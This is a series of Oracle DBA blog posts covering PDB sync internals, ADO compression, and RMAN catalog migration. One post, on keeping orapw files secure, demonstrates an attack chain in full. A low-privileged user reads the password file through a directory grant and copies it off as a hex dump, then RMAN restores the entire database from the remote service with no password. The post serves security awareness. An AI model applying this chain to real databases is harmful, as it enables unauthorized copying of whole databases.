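SQL> select p.con_id, p.replay# pdb_replay, r.replay# root_replay from containers(pdb_sync$) p, (select replay# from pdb_sync$ where opcode=-1 and bitand(flags,8)!=8) r where p.opcode=-1 and bitand(p.flags,8)!=8 and p.con_id>1 and p.replay# < r.replay#;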

I have PDB1 opened read write and PDB2 in read only:

SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
------ -------- ---- ---- ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
4 PDB2 READ ONLY NO

For the demo my user’s default tablespace is SYSTEM:

SQL> select con_id,username,common,default_tablespace from cdb_users where username='C##USER1' order by 1;
 
CON_ID USERNAME COMMON DEFAULT_TABLESPACE
------ -------- ------ ------------------
1 C##USER1 YES SYSTEM
3 C##USER1 YES SYSTEM
4 C##USER1 YES SYSTEM

Failure in opened containers

I want to change the default tablespace for C##USER1 and I have a USERS tablespace in CDB$ROOT (but not in the PDBs):

SQL> alter user C##USER1 default tablespace USERS;
 
Error starting at line : 50 File @ common-users-pdb-sync.sql
In command -
alter user C##USER1 default tablespace USERS
Error report -
ORA-65048: error encountered when processing the current DDL statement in pluggable database PDB1
ORA-00959: tablespace 'USERS' does not exist

As we have seen in the last post, the DDL is executed on all containers that are opened read write. Here it is fine on CDB$ROOT but fails on PDB1.

Then I create the USERS tablespace in PDB1:

SQL> alter session set container=PDB1;
Session altered.
SQL> create tablespace USERS datafile '/u01/oradata/CDB2/PDB1/users.dbf' size 5M;
Tablespace USERS created.
SQL> alter session set container=CDB$ROOT;
Session altered.

And now, the statement is successful in CDB$ROOT, replicated on PDB1:

SQL> alter user C##USER1 default tablespace USERS;
User C##USER1 altered.

This is nice: the statement is either successful in all containers, or it fails. When it is successful, the statements are recorded in PDB_SYNC$:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id=1 and bitand(flags,8)!=8 order by con_id,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
1 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 11
1 0 852610 26-jan-17 02:57:26 CTXSYS SYS 5 1 alter user CTXSYS account unlock identified by *^@
1 0 853177 26-jan-17 02:57:34 CTXSYS SYS 5 2 alter user CTXSYS password expire account lock^@
1 0 1405359 26-jan-17 03:31:31 SYSTEM SYS 5 3 alter user system account lock password expire^@
1 0 1408693 23-dec-17 11:34:43 SYS SYS 5 4 alter user sys account unlock identified by *^@
1 0 1408703 23-dec-17 11:34:43 SYSTEM SYS 5 5 alter user system account unlock identified by *^@
1 0 1466615 29-dec-17 09:26:56 C##PROFILE1 SYS 7 6 create profile C##PROFILE1 limit inactive_account_time 15 container=all^@
1 0 1466641 29-dec-17 09:26:57 C##ROLE1 SYS 3 7 create role C##ROLE1 container=all^@
1 0 1466748 29-dec-17 09:26:58 C##USER1 SYS 1 8 create user C##USER1 identified by * container=all^@
1 0 1466812 29-dec-17 09:26:59 C##USER1 SYS 5 9 alter user C##USER1 profile C##PROFILE1^@
1 0 1466853 29-dec-17 09:26:59 C##USER1 C##ROLE1 SYS 10 10 grant C##ROLE1 to C##USER1 container=all^@
1 0 1467010 29-dec-17 09:27:01 C##USER1 SYS 5 11 alter user C##USER1 default tablespace USERS^@

Failure in replay at open for closed containers

But PDB2 is not synchronized because it was not opened read write:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id>1 and bitand(flags,8)!=8 order by con_id,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
3 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 11
4 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10

But I don’t have a USERS tablespace in PDB2, so the replay will fail:

SQL> alter pluggable database PDB2 close;
Pluggable database PDB2 altered.
 
SQL> alter pluggable database PDB2 open;
ORA-24344: success with compilation error
Pluggable database PDB2 altered.

This is a warning only. The SQLcl feedback is a bit misleading, mentioning a compilation error because this is where we used to have warnings, but the SQL*Plus message is clearer:

SQL> alter pluggable database PDB2 open;
Warning: PDB altered with errors.

PDB2 cannot be left closed, because you need to create the tablespace there. But it cannot be opened to everyone either, because it is not in sync with CDB$ROOT. So what happens is that the PDB is opened in restricted mode:

SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
------ -------- ---- ---- ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
4 PDB2 READ WRITE YES

Note that if you look at PDB_SYNC$ in the PDB at that time, the PDB$LASTREPLAY already shows REPLAY#=11, but you also see rows for the statement that still has to be run. You have to connect to the PDB directly because containers() does not query containers opened in restricted session:

SQL> alter session set container=PDB2;
Session altered.
 
SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id>1 and bitand(flags,8)!=8 order by con_id,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
4 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 11
4 0 1469022 29-dec-17 09:27:02 C##USER1 SYS 5 11 alter user C##USER1 default tablespace USERS^@
 
SQL> alter session set container=CDB$ROOT;
Session altered.

Actually, the attempt to sync has inserted the statements and pushed the last replay indicator. Now the PDB has all the information to do a sync without the need to go to CDB$ROOT. The DDL was not replayed, but it has been stored locally. Once the sync is successful, the statements will be removed from the local PDB_SYNC$, leaving only the LASTREPLAY indicator.

PDB_PLUG_IN_VIOLATIONS

More info about the warning is stored in PDB_ALERT$, which you query through PDB_PLUG_IN_VIOLATIONS (the strange name is reminiscent of the TRANSPORT_SET_VIOLATIONS view used by DBMS_TTS):

SQL> select name, cause, type, status,action,message,time from pdb_plug_in_violations;
 
NAME CAUSE TYPE STATUS ACTION MESSAGE TIME
---- ----- ---- ------ ------ ------- -------------------------------
PDB2 Sync Failure ERROR PENDING Sync PDB failed with ORA-959 during 'alter user C##USER1 default tablespace USERS' 29-DEC-17 09.27.03.266780000 PM

Here you have the statement that failed and the error number, but no recommended ACTION. However, ORA-959 is “tablespace ‘%s’ does not exist” which gives a clue about the problem encountered.

As the PDB is opened a DBA (with RESTRICTED SESSION privilege) can add the tablespace:

SQL> alter session set container=PDB2;
Session altered.
 
SQL> create tablespace USERS datafile '/u01/oradata/CDB2/PDB2/users.dbf' size 5M;
Tablespace USERS created.

But you cannot simply disable restricted session:

SQL> alter system disable restricted session;
SQL> alter system disable restricted session;
 
Error starting at line : 74 File @ common-users-pdb-sync.sql
In command -
alter system disable restricted session
Error report -
ORA-65144: ALTER SYSTEM DISABLE RESTRICTED SESSION is not permitted
65144. 00000 - "ALTER SYSTEM DISABLE RESTRICTED SESSION is not permitted"
*Cause: An attempt was made to disable a restricted session while an unresolved error existed in PDB_PLUG_IN_VIOLATIONS.
*Action: Resolve all of the errors before trying to disable a restricted session.

One solution is to close and open the PDB to get the DDL replayed:
SQL> alter session set container=CDB$ROOT;
Session altered.
SQL> alter pluggable database PDB2 close;
Pluggable database PDB2 altered.
SQL> alter pluggable database PDB2 open;
Pluggable database PDB2 altered.

The other solution is to call DBMS_PDB.SYNC_PDB and disable restricted mode:

SQL> exec dbms_pdb.sync_pdb; commit;
PL/SQL procedure successfully completed.
 
SQL> alter system disable restricted session;
System DISABLE altered.

In both cases, no warning here, and no restricted mode:

SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
------ -------- ---- ---- ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
4 PDB2 READ WRITE NO

and the PDB_PLUG_IN_VIOLATIONS is updated to flag the issue as resolved:

SQL> select name, cause, type, status,action,message,time from pdb_plug_in_violations;
 
NAME CAUSE TYPE STATUS ACTION MESSAGE TIME
---- ----- ---- ------ ------ ------- -------------------------------
PDB2 Sync Failure ERROR RESOLVED Sync PDB failed with ORA-959 during 'alter user C##USER1 default tablespace USERS' 29-DEC-17 09.27.04.093659000 PM

At that time, the local PDB_SYNC$ table in PDB2 contains only the PDB$LASTREPLAY row, with the same value as in the CDB$ROOT table. The rows with the statements have been deleted once the DDL has been successfully replayed:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id>1 and bitand(flags,8)!=8 order by con_id,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
4 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 11

So what?

The mechanism is simple: record what is done in CDB$ROOT, replicate it in the PDBs when possible (opened read-write), try to replay it, and mark the last replay step. For containers that were not writeable, at open, the DDL is replicated on the PDBs that lag behind CDB$ROOT and the replay step is updated. Then the DDL is replayed. When successful, the statement is removed from the replicated DDL. When it fails, you get a warning, and a message in PDB_PLUG_IN_VIOLATIONS, and the PDB is opened in restricted session mode to let you solve the problem.
If you can fix the issue so that the DDL to be replayed is successful, then you can just sync and disable restricted session, or simply close and re-open the PDB.
If you can’t fix it, I suppose you need to hack the statements in the local PDB_SYNC$, with Oracle Support agreement of course, and make sure that you arrive at a state which is consistent with the other containers, especially CDB$ROOT.

 

Cet article 12c Multitenant internals: PDB_PLUG_IN_VIOLATIONS est apparu en premier sur Blog dbi services.

Keep your orapw password file secure


This is a small demo I did when I found a database password file (orapw) lying around in /tmp with -rw-rw-rw- permissions, to show why this is a bad idea. People think that the orapw file only contains hashes to validate a given password, and forget that it can be used to connect to a remote database without a password.

I can easily imagine why the orapw file was there in /tmp. To build a standby database, you need to copy the password file to the standby server. If you don’t have direct access to the oracle user, but only sudo access for ‘security reasons’, you can’t scp easily. Then you copy the file to /tmp, make it readable by all users, and you can scp with your user.
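As a quick sanity check on the server (a sketch, not part of the original demo), the password file should never be world-readable and no copy should stay in a shared location:
 
ls -l $ORACLE_HOME/dbs/orapw*
chmod 600 $ORACLE_HOME/dbs/orapw*
rm -i /tmp/orapw*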

In this demo I don’t even have access to the host. I only have access to connect to a PDB with the SCOTT user, created with utlsampl.sql, with one additional privilege: read access on $ORACLE_HOME/dbs:

SQL> connect sys/oracle@//192.168.56.122/PDB1 as sysdba

Connected.

SQL> create or replace directory DBS as '/u01/app/oracle/product/12.2.0/dbhome_1/dbs';

Directory DBS created.

SQL> grant read on directory DBS to SCOTT;

Grant succeeded.
People tend to grant many privileges, and think that a read access on a directory which is supposed to contain only configuration files is harmless. Let’s see what you can do from another server.

Get the orapw file from a remote connection

I connect with SCOTT which can read from ORACLE_HOME/dbs:

SQL> connect scott/tiger@//192.168.56.122/PDB1

Connected.

SQL> show user

USER is "SCOTT"

SQL> select * from all_directories;

OWNER DIRECTORY_NAME DIRECTORY_PATH ORIGIN_CON_ID

----- -------------- -------------- -------------

SYS DBS /u01/app/oracle/product/12.2.0/dbhome_1/dbs 4
I create a table to read this file (other possibilities: utl_file, external tables, …):

SQL> create table DEMO ( b blob );

Table DEMO created.

SQL> insert into demo values ( bfilename('DBS','orapwCDB1') );

1 row inserted.
I’m on another server with the same version of Oracle Database software installed.

I use sqlplus to retrieve the server file to my client:

sqlcl -s scott/tiger@//192.168.56.120/PDB1 <<EOF | xxd -p -r > $ORACLE_HOME/dbs/orapwCDB1

set pages 0 lin 17000 long 1000000000 longc 16384

select * from DEMO;

exit

EOF
This (documented by Laurent Schneider) uses sqlplus to display the BLOB variable as hexadecimal code and xxd (installed with vim-common) to revert it to binary.

So, on my server I have a copy of the database password file for the database I want to steal:

[oracle@VM122 ~]$ strings /u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapwCDB1

ORACLE Remote Password file

X)l)|

SYSDG

+933k\

SYSBACKUP

f ts6 $9

SYSKM

Pull

A nice feature of 12c is the ability to pull backups from a service: it is the destination that connects to the source (I have diagrams to explain this here). It is an easy alternative to RMAN DUPLICATE (see MOS Doc ID 2283978.1 Creating a Physical Standby database using RMAN restore from service). And one difference is that you don’t have to provide the password:

I prepare a small init.ora and directory for the datafiles

echo "db_name=CDB1" > $ORACLE_HOME/dbs/initCDB1.ora

mkdir -p /u01/oradata/CDB1
I’m still on my server, with the copy of the remote orapw file and network access to the source database, and I just restore the database from there, without the need for a password:

RMAN> connect target /

connected to target database (not started)
I start a local instance:

RMAN> startup nomount force

Oracle instance started

Total System Global Area 859832320 bytes

Fixed Size 8798552 bytes

Variable Size 784338600 bytes

Database Buffers 58720256 bytes

Redo Buffers 7974912 bytes
I restore the controlfile:

RMAN> restore controlfile from service '//192.168.56.122/CDB1';

Starting restore at 05-JAN-18

using target database control file instead of recovery catalog

allocated channel: ORA_DISK_1

channel ORA_DISK_1: SID=262 device type=DISK

channel ORA_DISK_1: starting datafile backup set restore

channel ORA_DISK_1: using network backup set from service //192.168.56.122/CDB1

channel ORA_DISK_1: restoring control file

channel ORA_DISK_1: restore complete, elapsed time: 00:00:02

output file name=/u01/oradata/CDB1/control01.ctl

output file name=/u01/fast_recovery_area/CDB1/control02.ctl

Finished restore at 05-JAN-18
That’s the interesting part: the restore has to connect to the source database, at least as SYSOPER, but I didn’t provide any password.

I mount this controlfile locally:

RMAN> alter database mount;

Statement processed

released channel: ORA_DISK_1
And now it is easy to pull the whole database (the CDB with all its PDBs) to my local server:

RMAN> restore database from service '//192.168.56.122/CDB1';

Starting restore at 05-JAN-18

Starting implicit crosscheck backup at 05-JAN-18

allocated channel: ORA_DISK_1

channel ORA_DISK_1: SID=262 device type=DISK

Crosschecked 6 objects

Finished implicit crosscheck backup at 05-JAN-18

Starting implicit crosscheck copy at 05-JAN-18

using channel ORA_DISK_1

Finished implicit crosscheck copy at 05-JAN-18

searching for all files in the recovery area

cataloging files...

cataloging done

List of Cataloged Files

=======================

File Name: /u01/fast_recovery_area/CDB1/autobackup/2018_01_04/o1_mf_s_964524009_f4vzyt59_.bkp

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_15_f4w5vv19_.arc

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_16_f4wmm0t8_.arc

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_14_f4vzjdl1_.arc

using channel ORA_DISK_1

channel ORA_DISK_1: starting datafile backup set restore

channel ORA_DISK_1: using network backup set from service //192.168.56.122/CDB1

channel ORA_DISK_1: specifying datafile(s) to restore from backup set

channel ORA_DISK_1: restoring datafile 00001 to /u01/oradata/CDB1/system01.dbf

channel ORA_DISK_1: restore complete, elapsed time: 00:00:16

channel ORA_DISK_1: starting datafile backup set restore

...
So what?

This is not an issue and is totally expected. In a Data Guard configuration, the primary and standby databases have to communicate with each other and thus need passwordless authentication. This is done with the password file, and this is the reason why you need to copy it rather than just create another one with the same passwords.

So, the file contains more than just a hash of the password (which is required to validate a password): it probably also includes a key (randomly generated when you create the password file) used for passwordless authentication.

Then, be careful, and do not give read access to the orapw files. You must secure them in the same way as an ssh key or an encryption wallet, and this includes:

  • Do not leave a copy of the orapw file in a shared location
  • Be careful with grants on directories, even in READ
  • Do not grant CREATE ANY DIRECTORY except for a PDB with PATH_PREFIX lockdown (see the sketch below)
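As an illustration of the last point, here is a sketch (hypothetical PDB name and path) of a PDB created with PATH_PREFIX, so that directory objects created inside it are confined under that path:
 
SQL> create pluggable database PDBAPP admin user admin identified by oracle path_prefix='/u01/oradata/CDB1/PDBAPP/';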
 

Cet article Keep your orapw password file secure est apparu en premier sur Blog dbi services.

Automatic Data Optimization Part I : Compression Tiering


Nowadays data volumes keep increasing, and two challenges we often face are how to reduce storage costs and how to improve performance. With Oracle 12c, the Automatic Data Optimization (ADO) feature can help us.
In this first blog we will see how we can use ADO to compress data under predefined conditions.
ADO is part of Information Lifecycle Management (ILM). Note that ADO requires the Advanced Compression Option.
In this article we are using an Oracle 12.1.0.2 non-CDB database.
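A quick check that the Advanced Compression option is available in the binaries (a sketch, not part of the original demo):
 
SQL> select parameter, value from v$option where parameter='Advanced Compression';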
First let’s create the user we will use for the demonstration

SQL> create user app identified by app default tablespace users temporary tablespace temp;
User created.
.
SQL> grant create session,create table,alter tablespace,select any dictionary,unlimited tablespace to app;
Grant succeeded.

Now, with this user, let’s create a table and insert some data (the INSERT statements are not shown here):
SQL> show user
USER is "APP"
SQL> create table article(idart number,designation varchar2(20));
Table created.
.
SQL> select count(*) from article;
COUNT(*)
----------
1048576

What we will demonstrate is how data in the ARTICLE table can be automatically compressed if it has not been modified within the last 30 days, for example. It’s just an example and there are many other possible conditions.
First let’s verify that the compression attribute of the table article is disabled
SQL> show user
USER is "APP"
SQL> SELECT compression, compress_for FROM user_tables WHERE table_name = 'ARTICLE';
COMPRESS COMPRESS_FOR
-------- ------------------------------
DISABLED

We can also confirm that there is no compression in the table using this oracle script.
[oracle@serverora1 ]$ cat comp_art.sql
SELECT CASE compression_type
WHEN 1 THEN 'No Compression'
WHEN 2 THEN 'Advanced compression level'
WHEN 4 THEN 'Hybrid Columnar Compression for Query High'
WHEN 8 THEN 'Hybrid Columnar Compression for Query Low'
WHEN 16 THEN 'Hybrid Columnar Compression for Archive High'
WHEN 32 THEN 'Hybrid Columnar Compression for Archive Low'
WHEN 64 THEN 'Compressed row'
WHEN 128 THEN 'High compression level for LOB operations'
WHEN 256 THEN 'Medium compression level for LOB operations'
WHEN 512 THEN 'Low compression level for LOB operations'
WHEN 1000 THEN 'Minimum required number of LOBs in the object for which LOB compression ratio is to be estimated'
WHEN 4096 THEN 'Basic compression level'
WHEN 5000 THEN 'Maximum number of LOBs used to compute the LOB compression ratio'
WHEN 1000000 THEN 'Minimum required number of rows in the object for which HCC ratio is to be estimated'
WHEN -1 THEN 'To indicate the use of all the rows in the object to estimate HCC ratio'
WHEN 1 THEN 'Identifies the object whose compression ratio is estimated as of type table'
ELSE 'Unknown Compression Type'
END AS compression_type, n as num_rows
FROM (SELECT compression_type, Count(*) n
FROM (SELECT dbms_compression.Get_compression_type(USER, 'ARTICLE', ROWID) AS COMPRESSION_TYPE
FROM app.article)
GROUP BY compression_type
);
[oracle@serverora1 ]$

Below we can see that there is no compressed data
SQL> col COMPRESSION_TYPE for a20
SQL> @comp_art
COMPRESSION_TYPE NUM_ROWS
-------------------- ----------
No Compression 1048576

To use ADO for compression, the Heat Map must be enabled. Indeed, once enabled, the Heat Map will collect the statistics required for ADO actions. All accesses are tracked by the in-memory activity tracking module. So let’s enable the Heat Map at the instance level:

SQL> show parameter heat
NAME TYPE VALUE
------------------------------------ ----------- ------------------------------
heat_map string OFF
.
SQL> alter system set heat_map=ON scope=both;
System altered.
.
SQL> show parameter heat
NAME TYPE VALUE
------------------------------------ ----------- ------------------------------
heat_map string ON

By default the policy time is specified in days. If we query DBA_ILMPARAMETERS, the value of POLICY TIME determines whether ADO policies are specified in seconds or days: 1 for seconds, 0 for days (the default).

SQL> col name for a20
SQL> select * from DBA_ILMPARAMETERS;
NAME VALUE
-------------------- ----------
ENABLED 1
RETENTION TIME 30
JOB LIMIT 2
EXECUTION MODE 2
EXECUTION INTERVAL 15
TBS PERCENT USED 85
TBS PERCENT FREE 25
POLICY TIME 0
8 rows selected.

But in our demonstration we will not wait 30 days, so we set the policy time to seconds instead of days: when we then specify 30 days, this will actually mean 30 seconds.

SQL> EXEC dbms_ilm_admin.customize_ilm(dbms_ilm_admin.POLICY_TIME,dbms_ilm_admin.ILM_POLICY_IN_SECONDS);
PL/SQL procedure successfully completed.
.
SQL> select * from DBA_ILMPARAMETERS;
NAME VALUE
-------------------- ----------
ENABLED 1
RETENTION TIME 30
JOB LIMIT 2
EXECUTION MODE 2
EXECUTION INTERVAL 15
TBS PERCENT USED 85
TBS PERCENT FREE 25
POLICY TIME 1
8 rows selected.
SQL>

Before adding the ADO policy, we can verify that heat map statistics are already collected.

SELECT OBJECT_NAME, to_char(TRACK_TIME,'DD-MON-YYYY HH24:MI:SS'), SEGMENT_WRITE "Seg_write",
SEGMENT_READ "Seg_read", FULL_SCAN, LOOKUP_SCAN
FROM v$heat_map_segment WHERE object_name='ARTICLE';
.
OBJECT_NAME TO_CHAR(TRACK_TIME,'DD-MON-YY Seg Seg FUL LOO
------------------------------ ----------------------------- --- --- --- ---
ARTICLE 08-JAN-2018 17:02:21 NO NO YES NO
SQL>

Now let’s add a segment-level row compression policy on the ARTICLE table that will compress the segment when no modification has occurred on it in the last 30 days (interpreted as 30 seconds due to the policy time setting).

SQL> show user
USER is "APP"
SQL> ALTER TABLE app.article ILM ADD POLICY ROW STORE COMPRESS ADVANCED SEGMENT AFTER 30 DAYS OF NO MODIFICATION;
Table altered.
SQL>

We can use the user_ilmdatamovementpolicies and user_ilmobjects with user app to verify the policy.

SQL> show user
USER is "APP"
SQL> SELECT policy_name, action_type, scope, compression_level, condition_type, condition_days FROM user_ilmdatamovementpolicies ORDER BY policy_name;
POLICY_NAME ACTION_TYPE SCOPE COMPRESSION_LEVEL CONDITION_TYPE CONDITION_DAYS
--------------- ----------- ------- ----------------- ---------------------- --------------
P45 COMPRESSION SEGMENT ADVANCED LAST MODIFICATION TIME 30
.
SQL> SELECT policy_name, object_name, enabled FROM user_ilmobjects;
POLICY_NAME OBJECT_NAME ENA
--------------- -------------------- ---
P45 ARTICLE YES

Let’s flush the heat map statistics from memory to disk and wait 30 days (in fact 30 seconds, because the policy time was changed to seconds instead of days). It can also sometimes be useful to gather the statistics of the table.

SQL> EXEC dbms_ilm.flush_all_segments;
PL/SQL procedure successfully completed.
SQL>

By default ADO policies are automatically evaluated during the maintenance window. But in this demonstration we are going to execute the policy manually, without waiting for the maintenance window.

SQL> show user
USER is "APP"
SQL> DECLARE
v_executionid number;
BEGIN
dbms_ilm.execute_ILM (ILM_SCOPE => dbms_ilm.SCOPE_SCHEMA,
execution_mode => dbms_ilm.ilm_execution_offline,
task_id => v_executionid);
END;
/
PL/SQL procedure successfully completed.
SQL>

Some info about the job can be obtained in the following views

SQL> SELECT task_id, start_time as start_time FROM user_ilmtasks order by 1;
TASK_ID
----------
START_TIME
---------------------------------------------------------------------------
26
08-JAN-18 05.28.45.788076 PM
SQL>
.
SQL> SELECT task_id, job_name, job_state, completion_time completion
FROM user_ilmresults ORDER BY 1 ;
TASK_ID
----------
JOB_NAME
--------------------------------------------------------------------------------
JOB_STATE
-----------------------------------
COMPLETION
---------------------------------------------------------------------------
26
ILMJOB98
COMPLETED SUCCESSFULLY
08-JAN-18 05.28.49.368009 PM

We can see that the job ran successfully. And we can verify that compression on the ARTICLE table is now enabled

SQL> SELECT compression, compress_for FROM user_tables WHERE table_name = 'ARTICLE';
COMPRESS COMPRESS_FOR
-------- ------------------------------
ENABLED ADVANCED
SQL>

And we can also see that all rows are compressed.

SQL> col COMPRESSION_TYPE for a20
SQL> @comp_art.sql
COMPRESSION_TYPE NUM_ROWS
-------------------- ----------
Advanced compression 1048576
level
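If you want to clean up after the demo, the policy can be removed and the policy time switched back to days; a sketch (P45 is the policy name shown above, and ILM_POLICY_IN_DAYS is the documented inverse constant):
 
SQL> ALTER TABLE app.article ILM DELETE POLICY P45;
SQL> EXEC dbms_ilm_admin.customize_ilm(dbms_ilm_admin.POLICY_TIME,dbms_ilm_admin.ILM_POLICY_IN_DAYS);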

Conclusion: In this first part we have seen how ADO can help us with compression. In a second post we will talk about data movement with ADO.

 

Cet article Automatic Data Optimization Part I : Compression Tiering est apparu en premier sur Blog dbi services.

ORACLE 11g to 12c RMAN catalog migration


This is a small migration demo of an 11g catalog (RCAT11G) to a new 12c catalog (RCAT12C).

The demo database environments have been easily managed thanks to the DBI DMK tool.

oracle@vmreforadg01:/home/oracle/ [RCAT11G] sqh
SQL*Plus: Release 11.2.0.4.0 

oracle@vmtestoradg1:/home/oracle/ [RCAT12C] sqh
SQL*Plus: Release 12.2.0.1.0

 

Current configuration

Displaying the list of databases registered in the RCAT11g catalog.

SQL> select instance_name from v$instance;

INSTANCE_NAME
----------------
RCAT11G

SQL> select * from rcat.rc_database;

    DB_KEY  DBINC_KEY       DBID NAME     RESETLOGS_CHANGE# RESETLOGS
---------- ---------- ---------- -------- ----------------- ---------
        41         42 3287252358 DB2TEST1                 1 05-JAN-18
         1          2   65811618 DB1TEST1                 1 05-JAN-18

 

Displaying the list of databases registered in the RCAT12c catalog.

SQL> select instance_name from v$instance;

INSTANCE_NAME
----------------
RCAT12C

SQL>  select * from rcat.rc_database;

no rows selected

 

Verifying existing backup meta data on RCAT11g.

SQL> select db_name, name from rcat.rc_datafile;

DB_NAME                        NAME
------------------------------ ------------------------------------------------------------
DB2TEST1                       /u01/oradata/DB2TEST11G/system01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/sysaux01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/undotbs01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/users01DB2TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/system01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/sysaux01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/undotbs01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/users01DB1TEST11G.dbf

8 rows selected.

 

Migrating RCAT11g to RCAT12c

Importing RCAT11g catalog data into RCAT12c.

oracle@vmtestoradg1:/home/oracle/ [RCAT12C] rman catalog rcat/manager
Recovery Manager: Release 12.2.0.1.0

RMAN> import catalog rcat/manager@RCAT11G;

Starting import catalog at 05-JAN-2018 13:39:56
connected to source recovery catalog database
PL/SQL package RCAT.DBMS_RCVCAT version 11.02.00.04 in IMPCAT database is too old
RMAN-00571: ===========================================================
RMAN-00569: =============== ERROR MESSAGE STACK FOLLOWS ===============
RMAN-00571: ===========================================================
RMAN-03002: failure of import catalog command at 01/05/2018 13:39:56
RMAN-06429: IMPCAT database is not compatible with this version of RMAN

 

When using IMPORT CATALOG, the version of the source recovery catalog schema must be equal to the current version of the destination recovery catalog schema. We therefore first need to upgrade the RCAT11g catalog schema.
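A quick way to check the current schema version of a catalog before and after the upgrade (a sketch; RCVER is the catalog version table, also queried later in this post):
 
SQL> select * from rcat.rcver;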

oracle@vmtestoradg1:/home/oracle/ [RCAT12C] sqlplus sys/manager@RCAT11G as sysdba
SQL*Plus: Release 12.2.0.1.0

SQL> @/oracle/u01/app/oracle/product/12.2.0/db_1_0/rdbms/admin/dbmsrmansys.sql

PL/SQL procedure successfully completed.


PL/SQL procedure successfully completed.


PL/SQL procedure successfully completed.


Grant succeeded.


Grant succeeded.


Grant succeeded.


Grant succeeded.


Grant succeeded.


PL/SQL procedure successfully completed.
oracle@vmtestoradg1:/home/oracle/ [RCAT12C] rman target sys/manager catalog rcat/manager@RCAT11G
Recovery Manager: Release 12.2.0.1.0

connected to target database: RCAT12C (DBID=426487514)
connected to recovery catalog database

RMAN> upgrade catalog;

recovery catalog owner is RCAT
enter UPGRADE CATALOG command again to confirm catalog upgrade

RMAN> upgrade catalog;

recovery catalog upgraded to version 12.02.00.01
DBMS_RCVMAN package upgraded to version 12.02.00.01
DBMS_RCVCAT package upgraded to version 12.02.00.01.

 

Verifying new version of RCAT11g catalog.

oracle@vmreforadg01:/u00/app/oracle/network/admin/ [RCAT11G] sqlplus rcat/manager
SQL*Plus: Release 11.2.0.4.0

SQL> select * from rcver;

VERSION
------------
12.02.00.01

 

Importing RCAT11g catalog data into RCAT12c catalog.

oracle@vmtestoradg1:/u01/app/oracle/network/admin/ [RCAT12C] rman catalog rcat/manager
Recovery Manager: Release 12.2.0.1.0

connected to recovery catalog database

RMAN> list db_unique_name all;


RMAN> import catalog rcat/manager@RCAT11G;

Starting import catalog at 05-JAN-2018 15:21:48
connected to source recovery catalog database
import validation complete
database unregistered from the source recovery catalog
Finished import catalog at 05-JAN-2018 15:21:52

RMAN> list db_unique_name all;


List of Databases
DB Key  DB Name  DB ID            Database Role    Db_unique_name
------- ------- ----------------- ---------------  ------------------
2       DB1TEST1 65811618         PRIMARY          DB1TEST11G
42      DB2TEST1 3287252358       PRIMARY          DB2TEST11G

 

Verifying new configuration

Displaying the list of databases registered in the RCAT11g catalog.

oracle@vmreforadg01:/u00/app/oracle/network/admin/ [RCAT11G] sqh
SQL*Plus: Release 11.2.0.4.0

SQL> select * from rcat.rc_database;

no rows selected

SQL> select db_name, name from rcat.rc_datafile;

no rows selected

SQL> select DB_KEY, DB_ID, START_TIME, COMPLETION_TIME from RCAT.RC_BACKUP_SET;

no rows selected

 

Displaying the list of databases registered in the RCAT12c catalog.

oracle@vmtestoradg1:/u01/app/oracle/network/admin/ [RCAT12C] sqh
SQL*Plus: Release 12.2.0.1.0

SQL> select * from rcat.rc_database;

    DB_KEY  DBINC_KEY       DBID NAME                          RESETLOGS_CHANGE# RESETLOGS FINAL_CHANGE#
---------- ---------- ---------- ----------------------------- ----------------- --------- -------------
        42         43 3287252358 DB2TEST1                                      1 05-JAN-18
         2          3   65811618 DB1TEST1                                      1 05-JAN-18

SQL> select db_name, name from rcat.rc_datafile;

DB_NAME                        NAME
------------------------------ ------------------------------------------------------------
DB2TEST1                       /u01/oradata/DB2TEST11G/users01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/system01DB2TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/system01DB1TEST11G.dbf
